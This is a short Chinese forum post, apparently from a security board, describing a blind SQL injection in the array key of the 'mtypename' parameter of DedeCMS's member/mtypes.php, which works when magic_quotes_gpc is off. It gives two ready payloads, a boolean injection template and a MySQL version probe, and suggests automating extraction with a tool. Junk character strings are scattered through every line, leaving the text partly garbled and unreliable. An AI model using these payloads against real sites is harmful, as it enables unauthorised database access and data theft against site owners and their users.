需要magic_quotes_gpc = Off,所以说是鸡肋啊.
, S; ^5 Q- B# b" [
# T( w9 G [4 O: |% q& l : n6 } n, L6 e
发生在数组key里的注射漏洞,有点意思.
2 {$ {1 g: l' g; x
6 ?6 y `$ X' G- u; u1 z这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
, }, v, F, L3 v7 c # z8 U2 w" s. _9 q% ~# F: S; q& ]
http://www.xxx.com /dede/member/mtypes.php?dopost=save+ ~1 Y2 \9 f( e$ M4 X {# S. F5 B1 A
( t* _/ g6 I- k g
exploit:/ @) x7 o0 b6 P, k2 W
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r7 \6 R f5 p9 `1 X; y
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r- D" q: Y* P1 Y$ b/ M ^$ J
|